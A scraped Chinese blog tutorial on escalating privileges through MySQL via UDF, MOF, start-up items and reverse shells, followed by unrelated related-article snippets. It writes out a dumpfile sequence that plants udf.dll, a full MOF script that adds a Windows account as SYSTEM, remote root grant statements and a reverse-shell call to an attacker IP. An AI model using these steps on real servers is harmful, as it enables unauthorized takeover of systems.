wordpress第一个版本学seo可以做网站吗

news/2025/9/23 15:17:06/文章来源:
wordpress第一个版本,学seo可以做网站吗,百度公司总部在哪里,背景墙素材高清图片免费目录 MySQL数据库提权简介 UDF提权 原理 利用条件 利用准备 利用过程 MOF提权 原理 利用条件 利用过程 自启动提权 反弹shell提权 总结 MySQL数据库提权简介 一般数据库提权思路#xff1a; 检测数据库的存在#xff08;探测端口#xff09;获取到数据库的权限…目录 MySQL数据库提权简介 UDF提权 原理 利用条件 利用准备 利用过程 MOF提权 原理 利用条件 利用过程 自启动提权 反弹shell提权 总结 MySQL数据库提权简介 一般数据库提权思路 检测数据库的存在探测端口获取到数据库的权限密码查看数据库的类型分类 最主要的就是要获取到数据库的账号密码获取方式大概有 读取网站的配置文件读取数据库备份文件下的库中的表的信息例如MySQL数据库在mysql_user表中存储账户密码使用cmd5-mysql5解码暴力破解账户密码需要支持外联mysql默认不支持。可以使用密码脚本在本地爆破也可以使用工具如msf的scanner mysql_login模块 MySQL数据库提权方式主要有三种 使用sqlmap的--os-shell使用写入一句话木马union select 1一句话木马3 into outfile/dumpfile 文件路径udf提权mof提权启动项提权-反弹shell-exp提权 UDF提权 原理 MySQL内置函数不满足需要所以MySQL提供了添加新函数的机制自行添加的MySQL函数就称作UDFUser-Defined-Function。 用户可以自定义提权的函数比如执行系统命令函数来进行提权。 MySQL版本大于5.1版本udf.dll文件必须放置在MySQL安装目录下的lib\plugin文件夹下 MySQL版本小于5.1版本udf.dll文件在Window2003下放置在C:\Windows\System32下在Windows2000放置在C:\Winnt\System32 利用条件 获取到MySQL权限或者说获取到MySQL账号密码能够调用MySQL语句MySQL具有写入功能也就是secure_file_priv值不为具体值或者为固定某值可以用SQL语句查询 show global variables like secure%;  要有root权限且要允许外连。root账户允许外连的SQL语句 grant all PRIVILEGS on *.* to root192.168.15.249 identified by 112358; 利用准备 1、熟悉对方的MySQL目录结构和主机型号使用SQL命令查看 show variables like %compile%; 2、确定MySQL的目录结构搜索位置 show variables like %plugin%; #查找具体目录 select basedir; #查看MySQL目录 3、kali里面其实有自带的udf提权脚本并且有32位和64位的版本目录位置 /usr/share/metasploit-framework/data/exploits/mysql 利用过程 如果有文件上传漏洞可以使用蚁剑等工具连接之后然后直接将提权脚本文件放入lib\plugin目录下然后使用mysql终端创建自定义函数sys_eval create function sys_eval returns string soname udf.dall; 直接在mysql终端创建目录导入文件 create table temp(data longblob); #以二进制数据流容器longblob创建临时data表 insert into temp(data) values (unhex(udf文件的16进制格式)); #将udf.dll脚本的十六进制写入data表 select data from temp into dumpfile xxx\\xxx\\lib\\plugin\\udf.dll; #将udf文件导入到指定目录 create function sys_eval returns string soname udf.dll; #创建自定义函数sys_eval 调用脚本创建sys_eval函数 可以使用kali自带脚本也可以用msf进行提权 最后为了删除痕迹要把刚刚新建的data表删掉。 MOF提权 原理 类似于udf提权但成功率低简单总结来说就是替换原来文件然后利用自启动原理执行文件进行提权。 在Windows系统下存在一个mof文件路径C:/Windows/System32/wbem/mof/nullevt.mof它的特点为每隔极短一段时间便会以System权限自动运行文件内脚本mof提权就是利用这点将写好的mof文件导入该目录中让它自动执行代码。 利用条件 有mysql账号和密码目录可写入 利用过程 select load_file(mof文件路径) into dumpfile c:/windows/system32/wbem/mof/nullevt.mof#pragma namespace(“\\\\.\\root\\subscription”) instance of __EventFilter as $EventFilter { EventNamespace “Root\\Cimv2”; Name “filtP2”; Query “Select * From __InstanceModificationEvent “ “Where TargetInstance Isa \”Win32_LocalTime\” “ “And TargetInstance.Second 5”; QueryLanguage “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name “consPCSV2”; ScriptingEngine “JScript”; ScriptText “var WSH new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“; }; instance of __FilterToConsumerBinding { Consumer $Consumer; Filter $EventFilter; };执行完毕替换net user hsy 123456 /add换为 net localgroup administrators hsy/add 即可将用户提升管理员权限 自启动提权 利用条件mysql开启外连知道账号密码 GRANT ALL PRIVILEGES ON *.* TO root% IDENTIFIED BY 密码 WITH GRANT OPTION;使用msf 搜索使用mysql start-up模块 设置目标IP 账号密码 还可以写入反弹shell接受IP 写入启动项 需要对方启动系统如果权限不够高可以尝试反弹shell能否获取更高权限 反弹shell提权 mysql创建反弹函数select backshell‘发送到的ip地址’,‘端口’kali使用nc监听本地攻击机IP nc -l本地-p 端口 总结 mysql提权有很多种方法有通过sqlmap的--os-shell、通过写入文件outfile/dumpfile、通过udf提权、通过mof提权、通过自启动提权等等mysql提权需要的三个条件要有能够执行数据库语句的权限知道数据库账号密码mysql数据库要有能够写入的权限secure_file_priv的值不为具体值或者为某个具体值为null表示禁止导入导出mysql账号要有root权限或者是有root权限的其他用户且要允许外连UDF提权原理是因为mysql提供自定义函数的功能所以可以自定义提权的函数例如命令执行等而udf.dll文件放在数据库目录下的lib/plugin下UDF提权利用方式可以通过蚁剑连接上传脚本后直接将udf.dll放置在目录下然后进行创建函数也可以通过mysql命令语句执行先创建表然后将文件内容的16进制传入表中然后再通过写入文件函数dumpfile写入指定目录最后再创建函数还可以利用脚本进行创建函数kali有自带的脚本也可以通过msf等的脚本利用工具。MOF提权相对于UDF提权相对利用率较低它是专门针对Windows提权的。原理是因为Windows下有一个mof文件路径在C:/Windows/system32/webm/mog/nullevt.mof下它特点是每隔一段时间系统就会以root权限去执行这个文件利用这一点就可以进行利用。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/912957.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站怎么做首页比较好燕郊seo

docker基本命令是一个开源的应用容器引擎;是一个轻量级容器技术;docker主机(Host):安装了Docker程序的机器(Docker直接安装在操作系统之上);docker客户端(Client):连接docker主机进行操作&#…

外包做网站一般多少钱wordpress中文标题转换拼音插件

用户管理 一个用户必须有一个主组一个用户可以拥有多个组 但是必须一个主组 其它组是临时组一个组可以拥有多个用户用户的信息放到 /etc/passwd 用户的密码 存入 /etc/shadow 组信息存到 /etc/group添加用户 add useradd shengliang 这时候会在 /etc/passwd 下生成一条记录 she…

珠宝行业网站建设生活馆网站开发背景

目录 1.定时任务实现 2.quartz说明 3.存储方式 4.示例 5.定时任务的重新定制,恢复,暂停及删除 1.定时任务实现 定时任务的实现方式有很多,如下: 1.启动类中添加EnableScheduling,开启定时任务功能,然…

搞笑椅子机房语录

抽象2025.9.23 (已知院长同学很爱唱“我要当主席”,此时正在唱校歌) 47:咋都开始唱校歌了 院长:我都当主席了还不能唱校歌了? 珂乌:还是当主席吧

在AI技术快速实现创意的时代,挖掘渗透测试框架新需求成为关键挑战

该篇文章无摘要a.内容描述核心功能定位:该项目是一个可扩展的后渗透测试和对抗仿真框架,采用服务器/客户端架构设计,主要面向专业渗透测试人员。服务器端采用Golang开发,客户端采用C++ QT框架实现跨平台支持。关键…

基于区域的空间域图像融合MATLAB实现

基于区域的空间域图像融合MATLAB实现,结合多尺度区域分割与特征加权策略一、方法原理区域分割 采用SLIC超像素分割算法将图像划分为均匀区域,每个区域包含约200-300个像素。 区域特征提取颜色特征:HSV空间均值 纹理…

网站seo自己怎么做什么是关键词

前言 对象图和包图依然是对系统的静态的描写叙述。UML九种图加上包图,事实上是十幅图。 包图 1.构成 2.包中的元素 类、接口、用例、构件、其他包等。(若包被撤销,当中的元素被撤销) 3.包之间的关系 泛化、细化、依赖(…

甘肃建设职工教育培训中心网站计算机网络设计是干什么的工作

文章目录 前言一、安装cudn二、安装cudnn三、安装pytorch 前言 确保Windows系统版本高于windows10 21H2或Windows11,然后在Windows中将显卡驱动升级到最新即可,WSL2已支持对显卡的直接调用。 一、安装cudn 进入英伟达官网中的cuda下载地址&#xff1…

怎么建造网站天津网站建设品牌推广

微软2024年1月的更新补丁正常更新会出现0x80070643错误,原因是正常安装系统默认的恢复分区留小了,通过压缩系统盘空间然后在diskgenius扩容恢复分区空间可以解决这个问题,但是笔者在进行上述操作时依旧出现了报错,按照网上的说法可…

intitle:律师网站建设的重要性做网站公司怎么样

为什么80%的码农都做不了架构师?>>> ##Win10除了Edge/IE,其他浏览器打开和载入速度都很慢 解决办法:以管理员身份运行cmd,输入netsh winsock reset重置winsock,然后重启电脑即可 转载于:https://my.oschin…

广州建设网站公司哪个济南兴田德润有活动吗做网站的图片=gif

Ajax-05 xhr(level-2)新特性 responseType属性和response属性 responseType: 表示预期服务器返回的数据的类型 “” ,默认空text,和空一样,表示服务器返回的数据是字符串格式json,表示服务器返回的是js…

网站登录 效果代码产品软文范例500字

如果没有正确的工具来汇总和解析日志数据,则几乎不可能找到并了解您正在寻找的信息。 日志有无穷无尽的用途,因为日志本身是无止境的。 应用程序日志,安全日志,BI日志, 林肯日志 (好吧,也许不是…

网站留白做301网站打不开

所有的NLP大模型 都是transformer结构 1.Mask attention 的策略不同 2.训练任务目标不同 国内大模型nb公司:百度、清华智谱 一、主流大模型 粉色:Encoder-only。 绿色:Encoder-Decoder,尽头智谱ChatGLM。 蓝色:…

梳理 | 脑神经科学原理学习资料整理

梳理 | 脑神经科学原理学习资料整理 前言 我想,我似乎一直都在试图探寻着什么,但在过去我甚至都不知道这一点 在近一年不断的在和AI交流的过程中我似乎渐渐地看清了自己的一点轮廓 【就像是最开始的这几篇甚至是在和…

如何做有效的Bug管理?

有效的Bug管理,就是让团队形成一种“对质量负责”的共识大家好,我是陈哥。 有读者留言说,他们团队老是因为反复出现同类Bug导致项目延期。 他们团队没有统一 Bug 记录渠道,测试人员一般发现问题口头告知或者汇总文…

深圳 赢客创想网络技术股份有限公司 网站建设网站建设和续费

前言 自动化测试中我们存放数据无非是使用文件或者数据库,那么文件可以是csv,xlsx,xml,甚至是txt文件,通常excel文件往往是我们的首选,无论是编写测试用例还是存放测试数据,excel都是很方便的。…

php网站开发专业介绍优化关键词的方法包括

日前,浪潮商用机器有限公司宣布,旗下K1 Power服务器系列产品经过几十项基础功能和高可用功能用例的专业测试,与腾讯新兴国产分布式数据库TDSQL完美兼容,且性能优异,可进行顺利的部署、平稳的运行及对外提供服务。此次互…

培训课程设计方案阿里巴巴网站的搜索引擎优化案例

文章目录 一.冯诺依曼体系结构1.1 为什么体系结构中要存在内存?1.2 冯诺依曼瓶颈 二.操作系统2.1 设计目的2.2 系统调用与库函数 一.冯诺依曼体系结构 冯诺依曼体系结构(Von Neumann Architecture)是计算机的基本设计理念之一,由…